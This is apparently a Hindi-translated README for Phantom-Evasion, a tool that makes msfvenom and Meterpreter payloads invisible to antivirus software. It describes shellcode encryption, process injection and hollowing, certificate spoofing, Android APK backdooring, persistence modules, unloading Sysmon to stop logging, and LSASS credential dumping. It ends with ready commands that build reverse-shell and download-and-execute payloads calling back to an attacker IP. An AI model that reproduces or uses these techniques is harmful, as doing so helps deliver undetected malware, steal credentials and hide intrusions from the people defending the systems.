
पायथन-आधारित एंटीवायरस एवेज़न टूल जो msfvenom पेलोड से अज्ञात एक्ज़ीक्यूटेबल उत्पन्न करता है, उन्नत तकनीकों जैसे junkcode इंजेक्शन, एन्क्रिप्शन, सर्टिफिकेट स्पूफिंग और एकाधिक निष्पादन विधियों के साथ।
Phantom-Evasion एक एंटीवायरस चोरी उपकरण है जो पायथन में लिखा गया है (पायथन और पायथन3 दोनों के साथ संगत) जो सबसे सामान्य x86 msfvenom पेलोड के साथ भी (लगभग) पूरी तरह से पता न लगने योग्य निष्पादन योग्य उत्पन्न करने में सक्षम है।
निम्नलिखित OS आधिकारिक रूप से स्वचालित सेटअप का समर्थन करते हैं:
निम्नलिखित OS संभवतः स्वचालित सेटअप का समर्थन करते हैं लेकिन metasploit-framework की मैन्युअल स्थापना की आवश्यकता होती है:
निम्नलिखित OS को मैन्युअल सेटअप की आवश्यकता है:
बस git clone करें या डाउनलोड करें और Phantom-Evasion फ़ोल्डर को अनज़िप करें
स्वचालित सेटअप, एक टर्मिनल खोलें और निष्पादित करें:
python3 phantom-evasion.py --setup
या:
chmod +x ./phantom-evasion.py
./phantom-evasion.py --setup
या इंटरैक्टिव मोड में phantom-evasion शुरू करें और विकल्प 7 चुनें
python3 phantom-evasion.py
या:
./phantom-evasion.py
python3 phantom-evasion.py --help
या:
./phantom-evasion.py --help
-प्रत्येक विंडोज पेलोड C मॉड्यूल और EXE या DLL/ReflectiveDLL के रूप में संकलित किया जा सकता है (x86 और x64 दोनों का समर्थन करता है)।
-रैंडमाइज्ड जंककोड इंजेक्शन (तीव्रता, आवृत्ति और पुनः इंजेक्शन संभावना सेट की जा सकती है) और विंडोज एंटीवायरस चोरी तकनीक (आवृत्ति सेट की जा सकती है)।
-शेलकोड इंजेक्शन और डाउनलोड एक्सिक्यूट मॉड्यूल दोनों में मल्टीबाइट Xor/Vigenere शेलकोड/फ़ाइल एन्क्रिप्शन समर्थित है।
-Ntdll unhookapi और Peb प्रक्रिया मास्करेडिंग तकनीक समर्थित है।
-निष्पादन मोड की विस्तृत श्रृंखला (स्थानीय और रिमोट दोनों) समर्थित है।
-पेलोड मेमोरी आवंटन मोड की विस्तृत श्रृंखला (Virtual_RWX, Virtual_RW/RX, Virtual_RW/RWX, Heap_RWX) समर्थित है।
-विंडोज API का डायनामिक लोडिंग सेट किया जा सकता है।
-प्रमाणपत्र स्पूफर और हस्ताक्षरकर्ता समर्थित है।
-स्ट्रिप निष्पादन योग्य (https://en.wikipedia.org/wiki/Strip_(Unix))
Msfvenom विंडोज पेलोड और कस्टम शेलकोड समर्थित हैं। शेलकोड को संसाधन के रूप में संग्रहीत किया जा सकता है और FindResource API के साथ रनटाइम पर पुनर्प्राप्त किया जा सकता है।
शेलकोड एन्क्रिप्शन समर्थित:
1. none
2. मल्टीबाइट-एक्सओआर
3. डबल-की मल्टीबाइट-एक्सओआर
4. विजेनेरे
5. डबल-की विजेनेरे
स्थानीय निष्पादन विधि निम्नलिखित में से एक हो सकती है:
Thread
APC
स्थानीय मेमोरी आवंटन मोड निम्नलिखित में से एक हो सकता है:
Virtual_RWX
Virtual_RW/RX
Virtual_RW/RWX
Heap_RWX
रिमोट निष्पादन विधि निम्नलिखित में से एक हो सकती है:
ThreadExecutionHijack (संक्षेप में TEH)
Processinject (संक्षेप में PI)
APCSpray (संक्षेप में APCS)
EarlyBird (संक्षेप में EB)
EntryPointHijack (संक्षेप में EPH)
रिमोट मेमोरी आवंटन मोड निम्नलिखित में से एक हो सकता है:
Virtual_RWX
Virtual_RW/RX
Virtual_RW/RWX
शुद्ध C मीटरप्रेटर स्टेगर (TCP/HTTP/HTTPS) मॉड्यूल msfconsole और कोबाल्ट स्ट्राइक बीकन के साथ संगत हैं। (reverse_tcp/reverse_http/reverse_https)
cmdline मोड का उपयोग करके:
reverse_tcp c स्टेगर WRT है
reverse_http c स्टेगर WRH है
reverse_https c स्टेगर WRS है
स्थानीय निष्पादन विधि निम्नलिखित में से एक हो सकती है:
Thread
APC
स्थानीय मेमोरी आवंटन मोड निम्नलिखित में से एक हो सकता है:
Virtual_RWX
Virtual_RW/RX
Virtual_RW/RWX
Heap_RWX
दिए गए URL से exe/dll को मेमोरी में डाउनलोड करें और रिमोट प्रक्रिया में निष्पादित/लोड करें (डिस्क पर लिखे बिना)।
EXE/DLL एन्क्रिप्टेड डाउनलोड समर्थित:
1. none
2. मल्टीबाइट-एक्सओआर
3. डबल-की मल्टीबाइट-एक्सओआर
4. विजेनेरे
5. डबल-की विजेनेरे
एन्क्रिप्टेड DLL/EXE को मूल फ़ाइलनाम + "crypt" + ".dll" या ".exe" के रूप में सहेजा जाएगा जो डाउनलोड किया जाने वाला है
Windows DownloadExecExe NoDiskWrite (cmdline मोड में WDE):
रिमोट निष्पादन विधि निम्नलिखित में से एक हो सकती है:
ProcessHollowing (संक्षेप में PH)
Windows DownloadExecDll NoDiskWrite (cmdline मोड में WDD):
रिमोट लोडिंग विधि निम्नलिखित में से एक हो सकती है:
ReflectiveDll (संक्षेप में RD)
RDAPC (ReflectiveDllAPC)
ManualMap (संक्षेप में MM) ---> केवल x86
Msfvenom linux पेलोड और कस्टम शेलकोड समर्थित हैं।
Android Msfvenom Obfuscate बैकडोर:
Msfvenom पेलोड को अस्पष्ट करें और (smali/baksmali) के साथ apktool का उपयोग करके पुनर्निर्माण करें। अस्पष्ट पेलोड का उपयोग हानिरहित apk फ़ाइलों को बैकडोर करने के लिए किया जा सकता है।
Windows Persistence RegCreateKeyExW Add Registry Key (C) संकलित निष्पादन योग्य को लक्ष्य मशीन पर अपलोड करने और निष्पादित करने की आवश्यकता है, जिसमें स्टार्टअप में जोड़ने के लिए फ़ाइल का पूर्ण पथ तर्क के रूप में निर्दिष्ट हो।
Windows Persistence REG Add Registry Key (CMD) यह मॉड्यूल स्थिरता cmdline पेलोड उत्पन्न करता है (REG.exe के माध्यम से रजिस्ट्री कुंजी जोड़ें)।
Windows Persistence Keep Process Alive (C) संकलित निष्पादन योग्य को लक्ष्य मशीन पर अपलोड करने और निष्पादित करने की आवश्यकता है। प्रत्येक X सेकंड में यह जाँचने के लिए CreateToolSnapshoot ProcessFirst और ProcessNext का उपयोग करें कि निर्दिष्ट प्रक्रिया जीवित है या नहीं (यदि नहीं तो WinExec API का उपयोग करके एक नई प्रक्रिया बनाएं)
Windows Persistence Schtasks (CMD)
यह मॉड्यूल स्थिरता cmdline पेलोड उत्पन्न करता है (Schtasks.exe का उपयोग करके)।
Windows Persistence Create Service (CMD)
यह मॉड्यूल स्थिरता cmdline पेलोड उत्पन्न करता है (sc.exe का उपयोग करके)।
Windows DuplicateTokenEx (C)
किसी अन्य प्रक्रिया से क्लोन किए गए टोकन के साथ एक नई प्रक्रिया बनाएं। संकलित निष्पादन योग्य को लक्ष्य मशीन पर अपलोड करने और निष्पादित करने की आवश्यकता है।
Windows Unload Sysmon (C) Sysmon ड्राइवर को अनलोड करें जो सिस्टम को sysmon इवेंट लॉग रिकॉर्ड करने से रोकता है। संकलित निष्पादन योग्य को लक्ष्य मशीन पर अपलोड करने और निष्पादित करने की आवश्यकता है।
Windows Unload Sysmon (CMD) Sysmon ड्राइवर को अनलोड करें जो सिस्टम को sysmon इवेंट लॉग रिकॉर्ड करने से रोकता है।
Windows Attrib hide file (CMD) फ़ाइल को छिपाने के लिए attrib का उपयोग करें
Windows SetFileAttribute hidden (C) SetFileAttribute API का उपयोग करके फ़ाइल छिपाएं संकलित निष्पादन योग्य को लक्ष्य मशीन पर अपलोड करने और निष्पादित करने की आवश्यकता है।
Windows DumpLsass (C) MiniWriteDumpWrite API का उपयोग करके Lsass डंप करें। संकलित निष्पादन योग्य को लक्ष्य मशीन पर अपलोड करने और निष्पादित करने की आवश्यकता है।
Windows DumpLsass (CMD)
cmdline से Lsass डंप करें।
python3 phantom-evasion.py -m WSI -msfp windows/meterpreter/reverse_tcp -H 192.168.1.123 -P 4444 -i Thread -e 4 -mem Virtual_RWX -j 1 -J 15 -jr 0 -E 5 -c www.windows.com:443 -f exe -o filename.exe
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp SkypeApp.exe -i PI -e 3 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -R -o filename.dll
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp svchost.exe -i EB -e 2 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -res -S -o filename.dll
python3 phantom-evasion.py -m WRS -a x64 -H 192.168.1.123 -P 4444 -i Thread -mem Heap_RWX -j 1 -J 15 -jr 0 -E 5 -f dll -S -o filename.dll
python3 phantom-evasion.py -m WDD -U http://192.168.1.123/payload.dll -i MM -tp OneDrive.exe -ds 1000000 -j 10 -J 10 -jr 0 -E 10 -f exe -S -o filename.exe
python3 phantom-evasion.py -m WDE -U http://192.168.1.123/payloadcrypt.exe -e 4 -ef payload.exe -i PH -tp svchost.exe -ds 1000000 -j 1 -J 5 -jr 0 -E 3 -f dll -R -S -o filename.dll
GPLv3.0
https://github.com/stephenfewer/ReflectiveDLLInjection
https://github.com/rsmudge/metasploit-loader
https://github.com/theevilbit/injection
http://www.rohitab.com/discuss/topic/40761-manual-dll-injection/
https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf